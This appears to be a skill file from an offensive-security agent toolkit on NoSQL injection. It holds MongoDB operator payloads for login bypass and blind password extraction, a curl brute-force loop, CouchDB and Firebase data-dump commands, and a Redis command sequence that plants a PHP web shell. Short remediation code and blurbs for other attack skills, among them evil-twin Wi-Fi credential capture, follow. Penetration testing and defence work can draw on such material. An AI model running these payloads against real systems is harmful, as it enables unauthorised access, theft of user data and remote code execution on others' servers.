NoSQL injection — MongoDB operator injection ($ne, $gt, $where, $regex), CouchDB / Firebase / Redis attack patterns, auth bypass, blind extraction.
| name | nosqli |
| description | NoSQL injection — MongoDB operator injection ($ne, $gt, $where, $regex), CouchDB / Firebase / Redis attack patterns, auth bypass, blind extraction. |
| metadata | {"when_to_use":"nosql mongodb mongo couch redis firebase $ne $gt $where injection","mitre_attack":"T1190, T1212","subdomain":"injection","upstream_ref":"skills/_corpus/payloads/NoSQL Injection/"} |
NoSQL stores parse JSON / native objects. When user input becomes part of a query object (not just a value), control flows into the query.
// Vulnerable: db.users.findOne({user: req.body.user, pass: req.body.pass})
POST /login
{"user": {"$ne": null}, "pass": {"$ne": null}} // returns first user
{"user": "admin", "pass": {"$gt": ""}} // admin if pw exists
{"user": "admin", "pass": {"$regex": "^A"}} // blind char extraction
{"$where": "this.user == 'admin' && sleep(5000)"} // time-based
{"$where": "function() { return this.user.length > 0 && this.user.match(/^a/) }"}
$where was deprecated in Mongo 4.4 — still appears in legacy.
# Burp Intruder w/ payload list
for char in {a..z}; do
curl -s -X POST $TARGET/login \
-d "{\"user\":\"admin\",\"pass\":{\"\$regex\":\"^${char}\"}}" \
| grep -q "success" && echo "char: $char"
done
# Admin party (no auth required)
curl http://target:5984/_all_dbs
curl http://target:5984/_users/_all_docs
# Then read/modify any document
# Public-read databases (most common misconfig)
curl https://YOUR-FIREBASE-PROJECT.firebaseio.com/.json
# Returns entire DB if rules are "true"
# Unauth Redis (still common on internal nets, occasionally exposed)
redis-cli -h target -p 6379 INFO
# Module loading attack if running as root + module dir writable
redis-cli -h target FLUSHALL
redis-cli -h target SET dir /var/www/html
redis-cli -h target SET dbfilename shell.php
redis-cli -h target SET payload "<?php system($_GET['c']); ?>"
redis-cli -h target SAVE
nosqlmap.py)# Mongo auth bypass via curl
curl -s -X POST $TARGET/api/login \
-H "Content-Type: application/json" \
-d '{"username": {"$ne": null}, "password": {"$ne": null}}' \
| jq
# If logged-in-as-admin → critical
| Bug | Severity |
|---|---|
Auth bypass via $ne | Critical 9.8 |
| Blind char extraction of all user data | Critical 9.0 |
$where JS injection → RCE-adjacent (mongo runs the JS) | Critical 9.8 |
| Public CouchDB / Firebase | Critical (depends on data sensitivity) |
| Unauth Redis on internal net | High 7-8 |
// Sanitize/typecheck before query
if (typeof req.body.user !== 'string') return res.status(400).send();
if (typeof req.body.pass !== 'string') return res.status(400).send();
// Or use parameterized queries / Mongo ODM (Mongoose schemas)
User.findOne({user: req.body.user}).select('+password');
// Disable $where globally
mongoose.set('strictQuery', true);
skills/_corpus/payloads/NoSQL Injection/skills/exploit/web/sqli.mdWeb application exploitation — the primary category skill for all web-based attacks. This is a routing skill: read this first to identify the attack type, then load the appropriate specialized sub-skill for detailed procedures. Covers 11 technique areas across injection, file access, authentication, and API exploitation.
HTTP Request Smuggling (HRS) — front-end / back-end parser disagreement attacks that desync the proxy stack. Covers CL.TE, TE.CL, TE.TE, CL.0, HTTP/2 downgrade (h2.cl, h2.te), pipelining, and connection-state pinning. Includes a confirm-desync gate, header obfuscation catalog, and minimal raw-socket Python harnesses (no smuggler.py available in sandbox).
Use when the engagement target is an Android (APK / AAB) or iOS (IPA) application. Covers static analysis (jadx, apktool, class-dump), dynamic instrumentation via Frida and Objection, SSL-pinning bypass, root/jailbreak detection bypass, deep-link / URL-scheme abuse, exported-component attacks, IPC redirection, WebView vulnerabilities, and biometric / Face ID / Touch ID bypass.
Web application enumeration hub — directory/file fuzzing, vhost discovery, API enumeration, CMS scanning, WAF detection, auth surface mapping, cookie audit.
Evil-twin rogue AP with KARMA/Mana PNL-probe response, captive-portal credential capture, and post-association MITM for PSK/open networks. Distinct from wpa-enterprise-eap which targets 802.1X.
Top-level index for the Decepticon 802.11 wireless attack suite. Routes the WirelessOperator to the correct leaf skill based on the target AP's crypto column (PSK / SAE / MGT / WPS) and engagement posture. BLE, Zigbee, Z-Wave, LoRaWAN, and sub-GHz live under iot/ by design — link provided below to prevent duplication.